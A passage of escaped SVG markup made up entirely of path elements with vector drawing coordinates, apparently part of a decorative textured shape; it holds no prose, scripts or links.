d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path 